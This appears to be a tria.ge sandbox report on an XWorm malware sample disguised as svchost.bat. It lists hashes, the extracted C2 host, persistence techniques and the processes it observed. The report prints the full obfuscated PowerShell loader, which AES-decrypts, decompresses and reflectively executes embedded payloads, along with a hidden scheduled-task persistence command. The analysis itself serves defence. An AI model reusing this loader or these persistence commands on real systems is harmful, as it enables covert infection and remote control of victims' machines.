Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
26s -
max time network
30s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
04/07/2024, 16:09
Static task
static1
Behavioral task
behavioral1
Sample
svchost.bat
Resource
win11-20240508-en
General
-
Target
svchost.bat
-
Size
287KB
-
MD5
9be1452fccb6a9ca2b3e28b89d0c879e
-
SHA1
8fe95b338be85b1ceac233a51abf3c59890741a7
-
SHA256
fa57646f828af97268c76a06db56ef3c7dbc6c87d8b3a49579783b346c1ef6b6
-
SHA512
f2376350ff5e8b5c405c3e48370a22d140249c77a3c5b69f88e55c87f5f643f501a95f1dcf3e361619562ca4fdefa403caed95cb26bb6250c4a62a270803474f
-
SSDEEP
6144:eIAZ2ZdcY5dv7vuw8UD2CmmrVKsQ7p/0FD+Q7b7QatJqYS:eIAZWcGv7N8UDa+VK790FqQTQc3S
Malware Config
Extracted
xworm
session-chief.gl.at.ply.gg:36125
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2104-48-0x0000027960740000-0x0000027960756000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 2 2104 powershell.exe 4 2104 powershell.exe 5 2104 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3560 powershell.exe 436 powershell.exe 2104 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3560 powershell.exe 3560 powershell.exe 436 powershell.exe 436 powershell.exe 2104 powershell.exe 2104 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3560 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeIncreaseQuotaPrivilege 436 powershell.exe Token: SeSecurityPrivilege 436 powershell.exe Token: SeTakeOwnershipPrivilege 436 powershell.exe Token: SeLoadDriverPrivilege 436 powershell.exe Token: SeSystemProfilePrivilege 436 powershell.exe Token: SeSystemtimePrivilege 436 powershell.exe Token: SeProfSingleProcessPrivilege 436 powershell.exe Token: SeIncBasePriorityPrivilege 436 powershell.exe Token: SeCreatePagefilePrivilege 436 powershell.exe Token: SeBackupPrivilege 436 powershell.exe Token: SeRestorePrivilege 436 powershell.exe Token: SeShutdownPrivilege 436 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeSystemEnvironmentPrivilege 436 powershell.exe Token: SeRemoteShutdownPrivilege 436 powershell.exe Token: SeUndockPrivilege 436 powershell.exe Token: SeManageVolumePrivilege 436 powershell.exe Token: 33 436 powershell.exe Token: 34 436 powershell.exe Token: 35 436 powershell.exe Token: 36 436 powershell.exe Token: SeIncreaseQuotaPrivilege 436 powershell.exe Token: SeSecurityPrivilege 436 powershell.exe Token: SeTakeOwnershipPrivilege 436 powershell.exe Token: SeLoadDriverPrivilege 436 powershell.exe Token: SeSystemProfilePrivilege 436 powershell.exe Token: SeSystemtimePrivilege 436 powershell.exe Token: SeProfSingleProcessPrivilege 436 powershell.exe Token: SeIncBasePriorityPrivilege 436 powershell.exe Token: SeCreatePagefilePrivilege 436 powershell.exe Token: SeBackupPrivilege 436 powershell.exe Token: SeRestorePrivilege 436 powershell.exe Token: SeShutdownPrivilege 436 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeSystemEnvironmentPrivilege 436 powershell.exe Token: SeRemoteShutdownPrivilege 436 powershell.exe Token: SeUndockPrivilege 436 powershell.exe Token: SeManageVolumePrivilege 436 powershell.exe Token: 33 436 powershell.exe Token: 34 436 powershell.exe Token: 35 436 powershell.exe Token: 36 436 powershell.exe Token: SeIncreaseQuotaPrivilege 436 powershell.exe Token: SeSecurityPrivilege 436 powershell.exe Token: SeTakeOwnershipPrivilege 436 powershell.exe Token: SeLoadDriverPrivilege 436 powershell.exe Token: SeSystemProfilePrivilege 436 powershell.exe Token: SeSystemtimePrivilege 436 powershell.exe Token: SeProfSingleProcessPrivilege 436 powershell.exe Token: SeIncBasePriorityPrivilege 436 powershell.exe Token: SeCreatePagefilePrivilege 436 powershell.exe Token: SeBackupPrivilege 436 powershell.exe Token: SeRestorePrivilege 436 powershell.exe Token: SeShutdownPrivilege 436 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeSystemEnvironmentPrivilege 436 powershell.exe Token: SeRemoteShutdownPrivilege 436 powershell.exe Token: SeUndockPrivilege 436 powershell.exe Token: SeManageVolumePrivilege 436 powershell.exe Token: 33 436 powershell.exe Token: 34 436 powershell.exe Token: 35 436 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 5040 wrote to memory of 3560 5040 cmd.exe 78 PID 5040 wrote to memory of 3560 5040 cmd.exe 78 PID 3560 wrote to memory of 436 3560 powershell.exe 80 PID 3560 wrote to memory of 436 3560 powershell.exe 80 PID 3560 wrote to memory of 564 3560 powershell.exe 82 PID 3560 wrote to memory of 564 3560 powershell.exe 82 PID 564 wrote to memory of 720 564 WScript.exe 83 PID 564 wrote to memory of 720 564 WScript.exe 83 PID 720 wrote to memory of 2104 720 cmd.exe 85 PID 720 wrote to memory of 2104 720 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_991_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_991.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_991.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_991.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Roaming\startup_str_991.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2104
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5824da05d0f31c23ab953467d7a3812f7
SHA148349c5986cb56777bf77e747eafbc2f87dfc2c1
SHA2566d266b3c94b03d8ed8648328f707c58177b2075c963aff4cbe6576d93df518b8
SHA5125c35ada146f86ebaefc96d82f7176f7ccabf179a5297b04fb7f56a88cb6a8a1b1bb159b04599cf8f581f49a08137530aa3cc8a1e5c67a383880c6998e84c5367
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
287KB
MD59be1452fccb6a9ca2b3e28b89d0c879e
SHA18fe95b338be85b1ceac233a51abf3c59890741a7
SHA256fa57646f828af97268c76a06db56ef3c7dbc6c87d8b3a49579783b346c1ef6b6
SHA512f2376350ff5e8b5c405c3e48370a22d140249c77a3c5b69f88e55c87f5f643f501a95f1dcf3e361619562ca4fdefa403caed95cb26bb6250c4a62a270803474f
-
Filesize
115B
MD531ad013b3aa57b3fbb6cb1e560d05fe7
SHA1fd7e96db28efd6baed7cd97e90dadb8f58b0c162
SHA256fff219810b246a986ec84d671e01e2cf55a95c27fdfae873f8eba20cd24a5dfb
SHA512f1c95d6ac70f5bd862fd48a2e47036e48f80e7b0bf650856e4d8d8f5491d06af5364e98dd1bca50fda9a424e161c440193b312e748f0dd2fdd553f28743d1c28